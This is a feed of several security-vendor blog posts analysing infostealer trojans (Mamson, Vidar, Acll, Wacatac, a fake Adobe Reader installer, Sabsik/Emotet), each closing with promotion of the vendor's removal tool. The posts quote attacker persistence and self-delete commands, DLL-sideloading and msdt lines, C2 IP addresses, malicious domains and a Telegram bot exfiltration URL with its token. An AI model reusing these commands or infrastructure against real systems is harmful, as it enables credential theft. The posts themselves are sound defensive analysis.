Mamson Trojan often spreads under the guise of helpful utilities downloaded from shady websites, including These places have ideal conditions for malware distribution, as most hacked software requires mandatory disabling of antivirus software during installation. In certain cases, it may hide in the installer.

Technical Analysis

Let’s analyze Trojan:Win32/Mamson.A!ac by tearing down one of its samples. Since this detection is generic, there could be rather wild variations in certain areas, but the “mainstream” functionality remains the same.

Once Mamson enters the system, it checks for the virtual environment, debugging, or sandboxing. For this, It checks the following values in the registry:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft/Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Display

These keys keep info about the OS version, language packs, and display settings. Such data is useful both for fingerprinting and to determine whether the environment has anything synthetic about it.

Privilege Escalation

After the first steps, the malware escalates privileges, which gives it a foothold in the system. To begin with, it manipulates the Windows Error Reporting system to legitimize itself.

%windir%\system32\wbem\wmiprvse.exe
%windir%\System32\svchost.exe -k WerSvcGroup
%windir%\system32\WerFault.exe -u -p 2660 -s 684

Further, it creates its own service, by executing a command to the Service Control Manager. This makes Mamson much harder to remove manually, as services protect its underlying files. Attempting to remove it anyways after such a trick will likely result in BSOD, unless the antimalware software is used.

C:\Windows\system32\sc.exe start w32time task_started

Defence Evasion

To avoid detection, Mamson comes in a packed (encrypted) form that allows it to avoid static detection. In order to legitimize itself, the malware plays with registry keys of Identity Client Runtime Library (IdentityCRL). Some of the values are also used to keep malware configurations.

HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Immersive\production\Property\001880060ADF5C62
HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Immersive\production\Property\00188006102E98CE

To cover the tracks, this malware also manipulates the logs of Windows Error Reporting system. It edits out lines of the logs that contain the information about the WerFault interactions that I’ve mentioned above.

C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_executable.exe_515752de8867334bf1b5dff986a385cbabdecb_6ccb0f67_0f5f9b13
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_executable.exe_515752de8867334bf1b5dff986a385cbabdecb_6ccb0f67_0f5f9b13\Report.wer
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1FF4.tmp.dmp

Data Collection

Mamson infostealer has primary goal is to collect sensitive information. Upon finishing preparations, the malware starts with creating a folder at C:\Users\[USER]/Downloads\cp and copying data from C:\Users\[USER]\AppData\Google\Chrome\User Data\Default\Login Data. That folder keeps a wide range of information about user’s credentials and session tokens. It also collects the following data:

C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Crypto\Keys\de7cf8a7901d2ad13e5c67c29e5d1662_cbbb49d6-b7ff-44ca-aba5-8a5e250d4d42
C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\c74ecc55-989d-484d-a8fe-47bdfda57159
C:\Windows/System32\spp/store\2.0\cache\cache.dat.

Additionally, Mamson accesses cryptocurrency apps and wallets in order to harvest credentials. I did not have a spare crypto wallet to sacrifice for the test, so there were no corresponding logs. Once the data collection is complete, the malware sends it to one of the command servers. Their IP addresses are built into the malware sample:

23.216.147.76:443
23.216.147.64:443
104.86.182.8:443

How To Remove Trojan:Win32/Mamson.A!ac?

To remove Trojan:Win32/Mamson.A!ac you will need a scan with GridinSoft Anti-Malware. Since the malware primarily targets Windows’ built-in defenses, they may be disabled or not working correctly. With GridinSoft Anti-Malware, you will be sure that the malware is completely gone. Run a Full scan to check the entire system and remove even the most covert threats.

Trojan:Win32/Mamson.A!ac

The post Trojan:Win32/Mamson.A!ac appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/trojan-win32-mamson-aac/feed/ 0 21964
Password Stealer https://gridinsoft.com/blogs/password-stealer/ https://gridinsoft.com/blogs/password-stealer/#respond Tue, 28 May 2024 11:04:42 +0000 https://blog.gridinsoft.com/?p=1843 Password stealer is a type of data stealing malware, that aims at a specific category of information. They are often spread through phishing, malvertising, and sometimes in cracked software. Let’s have a more detailed look on how they work, and how to protect yourself against password stealers. What Is a Password Stealer? As its name… Continue reading Password Stealer

The post Password Stealer appeared first on Gridinsoft Blog.

]]>
Password stealer is a type of data stealing malware, that aims at a specific category of information. They are often spread through phishing, malvertising, and sometimes in cracked software. Let’s have a more detailed look on how they work, and how to protect yourself against password stealers.

What Is a Password Stealer?

As its name suggests, password stealer is a type of malware that aims to steal sensitive data. Mainly, this is about credentials to email accounts, social networks, and online banking. But these days, quite a few password stealers incorporate more diverse functionality. They now target crypto wallets, cookies, browser cache and saved passwords, Discord session tokens, and more.

how password stealer works

The primary distribution method of password stealers is phishing emails with malicious attachments. Sometimes, however, password stealers can also be distributed via malicious ads in search results. In a selection of cases, spear phishing was used to attack a specific person with the malware.

Technical Analysis

All stealers are generally very similar, so the properties that the current instance has to apply to the others, perhaps with minimal differences. This will be a rather simplified analysis aimed at understanding how password stealer works. I will get through the most common and important actions that this malware does. For the test sample, I’ve chosen Vidar Stealer – a classic password stealer written in C++. The attack commonly begins when the victim runs an infected file.

Defense Evasion

Like most malware, it has a few tricks that make it particularly difficult to detect on the system. When the malware comes under the guise of the installer of a legitimate program, it can contain a row of null bytes at the beginning, which pushes its size over 700 MB. This size allows it to avoid instant detection by antivirus solutions and online checkers like VirusTotal. Another trick aimed at evading detection is code obfuscation. The malware also checks system parameters to ensure it is not running in a virtualized environment. It checks values such as:

HKLM/System/Setup
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

These keys contain information about the system and hardware, which allows you to create a digital fingerprint of the infected system in addition to identification.

Data Collection

Once the malware is convinced that it is not running in a sandbox and has established a foothold in the system, it moves on to its primary function – information gathering. password stealer collects the following information from browsers:

C:\Users\admin\AppData\Local\Temp\History\History.IE5\index.dat
C:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.dat
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
C:\Windows\system32\CRYPTBASE.dll
C:\Documents and Settings\\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004
C:\Users\user\AppData\Local\Google\Chrome\User Data\

These folders contain information such as autofill, saved passwords, cookies, cache, and browser extensions. Next, stealer tries to collect crypto wallet data by checking the locations you can see below. This list includes only a few wallets, as the exact list is too long to mention.

C:\Users\user\AppData\Local\Blockstream\Green\wallets\
C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\

Data Exfiltration

The malware’s final operation step is stolen data exfiltration. To do this, password stealer communicates with C2 (Command and Control) to receive further instructions. By the way, there can be various options for communicating with C2. Attackers often still use classic C2 servers; sometimes, they use Telegram or Mastodon as intermediate servers. However, in our case, the malware uses Steam. Before sending the stolen data, stealer sends several requests, including:

GET https://steamcommunity.com/profiles/76561199548518734 200

This is a link to a Steam profile. However, the strange name profile’s name “sppmon http://195.201.131.165|” is the command for malware. This is actually the address of the final server that the stealer should connect to. The phrase “This user has also played as” suggests that the address in the name changes quite often.

Steam profile screenshot
Steam profile as intermediate server

When finished, stealer self-deletes itself and covers its tracks. Though, not all infostealers do this, preferring to stay in the system even after extracting all the data. But when they do, the shell command comes in handy:

"%ComSpec%" /c taskkill /im "%SAMPLENAME%" /f & erase "%SAMPLEPATH%" & exit

Difference Between Password Stealer and Spyware

Password stealers and spyware may look similar, but have some fundamental differences. The first difference lies in the principle of operation: stealer works quietly and quickly, often sticking to “steal and leave” tactics. Spyware, on the other hand, aims at a long and permanent presence in the system. Although some stealers can take screenshots and capture keyboard inputs in addition to collecting sensitive data, this is not the main functionality.

Spyware, on the other hand, can stay on an infected system for months and continuously collect data. This includes screenshots, capturing keystrokes, and camera and microphone recordings. This data is sent periodically or in real-time to the attacker’s server.

Safety Recommendations

Malware and password stealers in particular tend to become more and more sophisticated. Getting harder to detect, picking new spreading ways, collecting more and more data – all this makes them a menace to be aware about. Fortunately, the ways to prevent this from getting into your PC is not particularly hard.

  • Be careful with email attachments. This method is still the leading method among successful malware infections. Do not open attachments or click on links if the email has a suspicious sender or is not the email you were intentionally expecting.
  • Avoid cracked software. Pirated software is illegal in itself, but it carries serious risks. Attackers embed malicious code in “repacks”, as installing most hacked programs requires disabling security software.
  • Use security software. A reliable antimalware solution is essential because it can prevent malware from running and installing in case of user error. In addition, it will generally provide comprehensive protection by significantly reducing infection vectors. In addition, advanced solutions such as GridinSoft Anti-Malware have an Internet Security module that blocks potentially malicious sites.

The post Password Stealer appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/password-stealer/feed/ 0 1843
Trojan:Win32/Acll https://gridinsoft.com/blogs/trojan-win32-acll/ https://gridinsoft.com/blogs/trojan-win32-acll/#respond Thu, 23 May 2024 10:46:11 +0000 https://gridinsoft.com/blogs/?p=22298 Trojan:Win32/Acll is a stealer malware detected by Microsoft Defender. It targets sensitive information, login credentials, personal details, and financial data. It spreads through pirated software, malicious ads, or bundles. Trojan:Win32/Acll Overview Trojan:Win32/Acll is a stealer-type malicious software coded in Python. It is designed to extract and transmit sensitive information from devices. Such malware targets a… Continue reading Trojan:Win32/Acll

The post Trojan:Win32/Acll appeared first on Gridinsoft Blog.

]]>
Trojan:Win32/Acll is a stealer malware detected by Microsoft Defender. It targets sensitive information, login credentials, personal details, and financial data. It spreads through pirated software, malicious ads, or bundles.

Trojan:Win32/Acll Overview

Trojan:Win32/Acll is a stealer-type malicious software coded in Python. It is designed to extract and transmit sensitive information from devices. Such malware targets a wide range of data, including system information, login credentials, personal details, and financial data. In addition to extracting data from various applications such as browsers, email clients, messengers, and others, Trojan:Win32/Acll can grab files, do keylogging, manipulate clipboards, and perform other spyware functionalities.

Trojan:Win32/Acll detection window screenshot
Trojan:Win32/Acll detection window

It spreads through ways typical for other spyware – malicious email attachments and pirated applications. However, some of the samples appear to mimic hardware management tools, specifically fan controlling utilities and UEFI parameter modifiers. In this way, malware can obtain highest privileges, as such software commonly requires root-level access to work.

Technical Analysis

Let’s look at how Trojan:Win32/Acll behaves in the system. Despite most of the samples being a rather recent discovery, there are quite a few researches upon each of them, meaning that the malware is pretty widespread. Before starting its dirty deeds, it performs checks for the signs of virtualization in the environment. This reconnaissance helps Acll to avoid analysis or sandboxing. Malware checks the following locations:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy

These keys contain the user’s certificate stores, enforce the use of cryptographic algorithms, and control various aspects of system behavior and security. Malware also uses code obfuscation and other tricks to avoid detection.

Mutex Creation & Privilege Escalation

After reassuring it is not running in a compromising environment, Trojan:Win32/Acll creates mutexes to prevent more than one instance from running at the same time:

Local\SM0:3648:304:WilStaging_02
Local\SM0:5144:304:WilStaging_02

Then, the malware manipulates files and adds itself to the Task Scheduler to provide regular startups. Also, it creates entries in the Run registry keys, making the system run the malware upon startup.

schtasks /create /f /RU "%USERNAME%" /tr "%ProgramData%\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
HKEY_USERS\%SID%\Software\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV5

Creating these hooks finalizes the preparations, as the malware then switches to loading DLLs and launching at its full power. By using the C:\Windows\System32\wuapihost.exe -Embedding command, Acll performs sideloading and is ready to the next step.

Data Collection

As I said before, Trojan:Win32/Acll is an infostealer, with a specific target on sensitive user data and cryptocurrency wallets. The malware attempts to collect credentials as a hash or password in plaintext. In addition to searching on the device, it tries to retrieve passwords from shared password storage locations and browser folders. Acll checks the following locations:

C:\Program Files\Common Files\SSL\openssl.cnf
C:\Users\\AppData\Local\Google\Chrome\User Data\
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\
C:\Users\user\AppData\Local\BraveSoftware\Brave-Browser\User Data
C:\Users\user\AppData\Local\Vivaldi\User Data
C:\Users\user\AppData\Roaming\Opera Software\Opera GX Stable
C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data

Further, it switches to desktop cryptocurrency wallets. The list of targeted ones is not massive, but I am sure it is just the matter of time for this malware to start targeting others.

C:\Program Files\Common Files\SSL\cert.pem
C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
C:\Users\user\AppData\Roaming\Electrum\wallets
C:\Users\user\AppData\Roaming\Ethereum\keystore
C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
C:\Users\user\AppData\Roaming\bytecoin

Same story is about FTP and VPN credentials. Reviewed samples targeted only FileZilla, OpenVPN and NordVPN (if targeted them at all), but such functionality is not hard to implement. I would still recommend to reset all the passwords that were kept in this or another way on the affected device.

Data Exfiltration

After collecting the information, Trojan:Win32/Acll sends it to C2. Several Win32/Acll samples use the Telegram bot as an intermediate server, as evidenced by its network activity:

https://api.telegram[.]org/bot7006468177:AAEjUyc53owWdXWMasYo_ZE1Y7t2sH1O718/sendMessage
https://api.telegram.org/bot7006468177:AAEjUyc53owWdXWMasYo_ZE1Y7t2sH1O718/sendDocument

In addition to Telegram, the malware uses various cloud services, including OneDrive, Microsoft Azure, EdgeCast (Verizon Media), and others. Here is the list of IP addresses:

TCP 204.79.197.203:443
TCP 34.117.186.192:443
TCP 149.154.167.220:443
TCP 20.99.186.246:443

How To Remove Trojan:Win32/Acll?

To remove Trojan:Win32/Acll, I recommend using GridinSoft Anti-Malware, which you can download and install from the link below. After installation, run a Full scan and let it finish, so the program will find all the malware-related files. In addition to malware removal, GridinSoft Anti-Malware can provide proactive protection and internet security. This will help prevent malware installation even at the download stage.

Trojan:Win32/Acll

The post Trojan:Win32/Acll appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/trojan-win32-acll/feed/ 0 22298
How to remove Trojan:Script/Wacatac.B!ml https://gridinsoft.com/blogs/trojanwin32-wacatac/ https://gridinsoft.com/blogs/trojanwin32-wacatac/#respond Mon, 06 May 2024 13:54:09 +0000 https://gridinsoft.com/blogs/?p=18405 Trojan Wacatac is an umbrella detection for a wide range of malicious software, that shares functionality and code. In particular, the Wacatac name points to malware with dropper capabilities that are used to deliver ransomware. Trojan Wacatac Detection Trojan:Script/Wacatac.B!ml and Trojan:Win32/Wacatac.B!ml detection is one of the numerous detection names that Microsoft assigns to minor malware… Continue reading How to remove Trojan:Script/Wacatac.B!ml

The post How to remove Trojan:Script/Wacatac.B!ml appeared first on Gridinsoft Blog.

]]>
Trojan Wacatac is an umbrella detection for a wide range of malicious software, that shares functionality and code. In particular, the Wacatac name points to malware with dropper capabilities that are used to deliver ransomware.

Trojan Wacatac Detection

Trojan:Script/Wacatac.B!ml and Trojan:Win32/Wacatac.B!ml detection is one of the numerous detection names that Microsoft assigns to minor malware families. A lot of similar-yet-different malicious software received this name because of the use of the same code solutions and similar functionality. Microsoft’s name often becomes a common noun for all similar malware.

When it comes to functionality, Wacatac is mostly spyware or stealer malware. Some of the sub-specimens may be distinctive for using Discord, Telegram, or Mastodon as data exfiltration channels. To have a more clear understanding of what the malware under the Wacatac name looks like, let’s analyze a sample of malware detected as Wacatac.

Trojan:Script/Wacatac.B!ml

For the analysis of a real-world Wacatac trojan example, I’ve opted for a Trap Stealer. Microsoft detects it as Trojan:Script/Wacatac.B!ml (see more info on VirusTotal). The Python-based malware sample is pretty unique – it is an open-source stealer with the source code listed on GitHub. Its builder features extensive functionality, particularly offers to create a disguise out of the box. But let’s have a more precise look.

On the GitHub repository that contains the source code of the malware, its devs show most of the functionality. It corresponds to the abilities of a classic stealer: malware gathers info from WhatsApp, steals cookies, and contents of the clipboard and AutoFill, scrapes passwords, and can capture screenshots. On top of that, Trap Stealers boast of the ability to mischief the host system.

Wacatac malware functionality
Extensive list of functions that malware boasts of

Detection Evasion Methods

I’d pay additional attention to how this malware disguises itself. As I said, the builder offers not only to specify a Discord webhook as a relay server, but also to establish a “shell” that will make the user launch the malware deliberately. Currently, there are two options for this shell – a fake Discord webhook creation tool and a pseudo-Discord Nitro generator. Malware masters may choose one during the building, or choose none at all.

Though, these methods are called to evade user suspicion. Against anti-malware software, especially malware analysis environments, malware has several dedicated tricks up its sleeve.

Upon execution, this malware performs a row of checks that ensure that the system is not running a debug environment, resides away from the banned countries, and is not a virtual machine. If one of the checks returns an unacceptable result, any further execution will be terminated.

Checks Purpose
check_dll Scans the list of running DLLs, searching for ones related to virtualization software
check_IP Compares the system IP to the embedded blacklist of countries
check_registry Scans the Windows Registry for specific entries related to VMWare programs
check_windows Enumerates open windows and checks whether any of them are related to reverse engineering/debugging tools.

Establishing Persistence

Once all the aforementioned checks are done, Wacatac makes itself persistent to the attacked environment. It creates its randomly-named copy in a random directory in the AppData or LocalAppData folder of a user directory. Then, the malware adds a corresponding value to the Run entry of the system registry. This ensures the malware startup with the system.

These steps may be accompanied by more, if additional actions were specified in the process of sample building. For instance, malware can hook up to the Discord startup, or establish persistence using the user startup folder instead of the registry key.

Data Gathering

The malware proceeds to its normal activity after establishing persistence. The first thing to do is to collect all the data about the system – it gathers quite a big list of it. Interestingly enough, the malware sends the log with this info to the command server almost instantly. This contrasts with the typical fashion of doing things, when the stealer will get everything it can reach and only then send it to the C2.

System Info Malware Instance Info Software & Hardware Info
Username Node Name OS Name
IP Address Release System Activation Key
Country Version PC Name
Postal code Machine CPU Model
Region Home Directory GPU Model
City Installed Antivirus
Longitude/Latitude

This extensive list of system data is then accompanied by collected passwords and cookies. For stealing passwords, Wacatac particularly aims at web browser files. There, it seeks specific files that programs use to keep the info. Aside from files that can contain credentials, Wacatac also collects all the cookies it can find. All the stuff is then kept in the specific files in the AppData\Local\Temp directory, under specific names that start with the “wp” particle.

This Wacatac instance particularly goes for browsing history. Since the way it is handled is more or less unified for most of the browsers, malware targets quite a few of them. Here is the list:

  • Safari
  • Firefox
  • Chrome
  • Opera
  • Edge
  • Opera GX
  • Internet Explorer

Stealing Discord Tokens

The Trojan:Script/Wacatac.B!ml sample we are reviewing pays significant attention to Discord, though it is not unique for stealers. Moreover, the method it uses to extract the session tokens is more or less the same for all malware samples. Let’s dive into it.

To get Discord tokens from web browsers, Wacatac seeks for leveldb files (.ldb). It is a database file specific to Chromium-based browsers, that stores auth tokens, keys, and things the like. As there are quite a few popular browsers that derive from Chromium core, malware tries to target them all.

LevelDB files Chrome - Trojan:Script/Wacatac.B!ml
LevelDB files, stored in the Chrome folder

For the sake of clarity, it is worth noting that non-Chromium browsers are not invulnerable to such manipulations. By using database calls, malware can easily extract the info it needs, or even everything all at once. The fact that a browser keeps the data differently means just the need for a couple more lines in malware code.

Aside from crawling through the browser files, the malware also tries to grab the same Discord session tokens from the app’s directory. As there are a few different clients out there, the malware tries targeting them all by scanning for corresponding folders in the AppData\Roaming directory.

Stealing Data of Crypto Wallets & Gaming Apps

Another typical edge of interest for Trojan:Script/Wacatac.B!ml is crypto wallets as extensions, desktop apps, and gaming applications. It particularly aims for Metamask, Atomic, Exodus, and NationsGlory crypto wallets. However, stealing other wallets is just a question of a proper configuration, so they may appear in the future. All the collected data is compressed into a .zip folder and sent to the C2.

For gaming apps, malware particularly aims at Steam and Riot Client. Malware seeks for their folders in AppData\Local and then creates a zipped copy of their directories.

Exfiltration and C&C Connections

Once Trojan:Script/Wacatac.B!ml finishes the extraction, it will keep idling, waiting for new data to steal. Upon every startup, it will go through all the scans I’ve mentioned above, trying to find new stuff to steal. However, a malware master can order it to self-destruct when it finishes the data collection, or even enforce the system crash at this moment. This all is needed to hide the traces of malware activity.

Extracted info Trojan:Script/Wacatac.B!ml
Data that has been sent to the Discord webhook by the Trojan:Script/Wacatac.B!ml

Protecting Against Trojan:Script/Wacatac.B!ml

Stealer malware, such as Trojan:Script/Wacatac.B!ml, is often easily detectable by well-designed antivirus programs. An antivirus program equipped with heuristic detection systems and AI assistance can readily identify and remove this threat. GridinSoft Anti-Malware, in particular, is a reliable choice for this task. It can remove the malware and ensure your PC remains safeguarded for an extended period.

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

The post How to remove Trojan:Script/Wacatac.B!ml appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/trojanwin32-wacatac/feed/ 0 18405
Adobe Reader Infostealer Plagues Email Messages in Brazil https://gridinsoft.com/blogs/adobe-reader-infostealer-targets-brazil/ https://gridinsoft.com/blogs/adobe-reader-infostealer-targets-brazil/#respond Tue, 12 Mar 2024 19:26:13 +0000 https://gridinsoft.com/blogs/?p=20329 A recent email spam campaign reportedly spreads infostealer malware under the guise of Adobe Reader Installer. Within a forged PDF document, there is a request to install Adobe Reader app, that triggers malware downloading and installation. Considering the language of the said documents, this malicious activity mainly targets Portugal and Brazil. Infostealer Spreads in Fake… Continue reading Adobe Reader Infostealer Plagues Email Messages in Brazil

The post Adobe Reader Infostealer Plagues Email Messages in Brazil appeared first on Gridinsoft Blog.

]]>
A recent email spam campaign reportedly spreads infostealer malware under the guise of Adobe Reader Installer. Within a forged PDF document, there is a request to install Adobe Reader app, that triggers malware downloading and installation. Considering the language of the said documents, this malicious activity mainly targets Portugal and Brazil.

Infostealer Spreads in Fake Adobe Reader Installers

The recent attack campaign detected by ASEC Intelligence Center starts with email spam. The messages have a PDF file attached to them, with their contents in Portuguese. This seriously narrows down the list of countries the campaign is targeting – to Brazil and Portugal. Inside of the file, there is a pop-up prompt to install Adobe Reader, which is allegedly required to open the document. Short side note – modern web browsers can handle PDFs of any complexity with ease.

Following the instruction of a document triggers the downloading of a file named Reader_Install_Setup.exe, which obviously mimics a legit installation file of the program. It even repeats the icon, which makes the fraud even harder to understand at this stage. Running the thing, which in fact is a loader, initiates the malware execution.

Fake Adobe Reader installer

However, it does not happen instantly – malware performs a series of actions to pull the DLL hijack and run the final payload with the max privileges possible. First, it spawns an executable file and drops a DLL that contains actual payload and runs the msdt.exe process. The latter is a genuine Windows diagnostics tool that malware uses to call for a subordinate service.

C:\Windows\SysWOW64\msdt.exe" -path "C:\WINDOWS\diagnotics\index\BluetoothDiagnostic.xml" -skip yes – code used to call for MSDT, specifically its Bluetooth Diagnostic tool

This service will consequently load a malicious DLL I’ve mentioned above. The library, in turn, runs the said executable file, legitimizing the infostealer and providing it with max privileges.

Stealer Malware Analysis

Even though the malware used in the campaign appears to be unique and does not belong to any of the known malware families, its functionality can barely be called unusual. This infostealer gathers basic info about the system, sends it to the command server and then creates a directory to store the collected data. Malware adds the latter to the list of Microsoft Defender exclusions, so it will not disrupt its operations. Also, it mimics the legit Chrome folder by adding a fake executable file and also some of the files typical for a genuine browser folder.

Browser folder copy infostealer
A fake browser folder created by the infostealer to keep the collected data

The C2 servers used by some of the samples confirms the attack targeting hypotheses I’ve mentioned above. Hxxps://thinkforce.com[.]br/ and hxxps://blamefade.com[.]br/ receive the AutoFill data from all the browsers. While this is less than what modern infostealers typically gather, it is still sensible – browsers keep almost all of our passwords.

How to protect against infostealer malware?

Information stealers never were an underdog of the malware world, and they remain a potent threat regardless of the circumstances. However, even though their samples may feature outstanding anti-detection tricks, they still need to get in. And this is where you can avoid them with max efficiency.

Be careful with emails. Email spam is probably going to be the most widespread malware delivery way of this decade. Users tend to believe their content or simply ignore the related risks, which inevitably leads to malware infection. Seeing such a sketchy offer to install a long-forgotten app or perform an action that is not normally needed with this type of documents should raise suspicion. At the same time, texts of such messages may be ridiculous enough to make the fraud apparent.

Use official software sources. It happens for certain files to require specific software, but try to use only official distributions of one. Going to the developer’s site and downloading one is not that longer when compared to clicking a link.

Have decent anti-malware software on hand. Malware finds new spreading ways pretty much every day. To avoid falling victim to the most tricky sample, a software that will not allow it to get in is essential. GridinSoft Anti-Malware is a program that will provide you with real-time protection and network filters with hourly updates. This security tool will make sure that malware will not even launch in the first place.

Adobe Reader Infostealer Plagues Email Messages in Brazil

The post Adobe Reader Infostealer Plagues Email Messages in Brazil appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/adobe-reader-infostealer-targets-brazil/feed/ 0 20329
Trojan:Script/Sabsik.fl.A!ml Analysis & Removal Guide https://gridinsoft.com/blogs/trojanscript-sabsik-fl-aml-analysis-removal/ https://gridinsoft.com/blogs/trojanscript-sabsik-fl-aml-analysis-removal/#respond Thu, 07 Mar 2024 09:15:25 +0000 https://gridinsoft.com/blogs/?p=20180 Trojan:Script/Sabsik.fl.A!ml is a generic detection name used by Microsoft Defender. This name is particularly used to denote stealer malware that also possesses dropper capabilities. It can perform various activities of the attacker’s choice on the victim’s computer, such as spying, data theft, remote control, and installation of other viruses. In this article, we will tell… Continue reading Trojan:Script/Sabsik.fl.A!ml Analysis & Removal Guide

The post Trojan:Script/Sabsik.fl.A!ml Analysis & Removal Guide appeared first on Gridinsoft Blog.

]]>
Trojan:Script/Sabsik.fl.A!ml is a generic detection name used by Microsoft Defender. This name is particularly used to denote stealer malware that also possesses dropper capabilities. It can perform various activities of the attacker’s choice on the victim’s computer, such as spying, data theft, remote control, and installation of other viruses. In this article, we will tell you how to analyze, detect, and remove this trojan from your computer.

What is Trojan:Script/Sabsik.fl.A!ml?

Trojan:Script/Sabsik.fl.A!ml is a trojan detected by Windows Defender. This detection particularly refers to stealer malware that is also capable of other activities, for instance – deploying other malware.

Move MS Office file Emotet
Request to move a lure file to the MS Office root directory

Typically, Sabsik Trojans are distributed through email spam. The email attachments contain a hidden script that triggers the malware to download and run when macros are activated. As a result, users who accidentally open these files download and run the virus without realizing it. Some Sabsik samples can self-distribute through vulnerabilities in the Windows network, such as EternalBlue.

Trojan Sabsik Threat Analysis

Probably, the best-known malware sample that was detected as Trojan:Script/Sabsik.fl.A!ml is Emotet Trojan. Even though it now borders its extinction, the fact of this signature relation to this malware gives us an excellent clue on what you can expect when Sabsik is running in the system.

Launch and Detection Evasion

Emotet a.k.a Sabsik uses a variety of techniques to avoid detection by antivirus software and ensure it runs successfully on target systems. The malware typically employs deep packing, obfuscation, and other detection evasion techniques, making it difficult for traditional antivirus solutions to detect its presence. When arranging its launch, this malware typically performs a trick known as DLL sideloading.

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\007852768570c1d9528259e7e52aecf5e4ae97dadd75a459cc53f9acca65054d.dllto register the malware DLL.

C:\Windows\SysWOW64\rundll32.exe "C:\Users\Admin\AppData\Local\Temp\007852768570c1d9528259e7e52aecf5e4ae97dadd75a459cc53f9acca65054d.dll",DllRegisterServerto launch the latter.

Modules

Emotet is modular malware, meaning it can extend its functionality by loading additional modules. Not all Sabsik samples possess modularity, but it has become a more and more widespread feature in modern malware. Some of the common modules associated with this threat include:

  • Stealer Module – used for stealing banking credentials and other sensitive information.
  • Hardware Module – collects detailed information about the infected system.
  • XMRig Module – utilized for cryptocurrency mining purposes.
  • Advanced Email Stealer Module – steals email credentials and contact lists.
  • SMB Lateral Movement Module – enables lateral movement within a network by exploiting SMB vulnerabilities.
  • Traffic Proxying (UPnP) Module – facilitates the redirection of traffic to C2 servers through compromised servers.

Establishing Persistence & Data Stealing

After infecting the system, Sabsik creates a registry key in the infected system’s registry, ensuring that it is launched every time the system boots up. This persistence mechanism allows Sabsik to maintain a foothold on the infected system, even after reboots. Malware creates a DWORD key with the following contents in the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry hive:

C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Tzusqvzhnftw\gwwfpucmcdt.ruj

Data Collection & Other Functionality

Despite focusing on banking info, Emotet/Sabsik is capable of collecting various types of sensitive information from infected systems. This may include usernames, passwords, system information, and email credentials. Sabsik also possesses functionality for self-propagation through email spamming and lateral movement within networks, allowing it to rapidly spread and infect multiple systems.

Malware Delivery by Emotet

Despite originally being a banking stealer, Emotet is mostly known as dropper malware. In the prime days, vast networks controlled by Emotet were used to deploy various payloads to infected systems. Among them were ransomware, spyware, coin miners, and other types of malware. Emotet indiscriminately targets both individual users and organizations, spreading its malicious payloads according to the directives of its operators.

C:\Program Files\Google\Chrome\Application\chrome.exe" --disk-cache-dir=null --disk-cache-size=1 --media-cache-size=1 --disable-gpu-shader-disk-cache --disable-background-networking --disable-features=OptimizationGuideModelDownloading,OptimizationHintsFetching,OptimizationTargetPrediction,OptimizationHints "https://brooklyn.blob.core.windows.net/pen-test/MaliciousDOC.doc

Trojan:Script/Sabsik.fl.A!ml – False Positive or Not?

In some cases, Sabsik Trojan may be mistakenly detected by antivirus software if you try to run a legitimate file such as a game, application, or driver. This can happen due to an incorrect signature, incompatibility, corruption, or file change. According to several user reports, popular games downloaded from legitimate sources may sometimes be mistakenly flagged as Trojan:Script/Sabsik.fl.A!ml.

Mistakenly detected by antivirus

One particular example comes from a BattleNET user who purchased Diablo II Resurrected and was warned about the Sabsik Trojan when trying to launch the game. It’s not hard to guess that a game released by a company as big as Blizzard would not contain malware. If you are 100% sure that the source of your download is safe, the Sabsik Trojan notification could easily be a false positive.

It is also important to note the presence of the “!ml” particle added to the detection name. This stands for the use of an AI detection system. While this method is highly effective, it can generate false positive detections without confirmation from other detection systems.

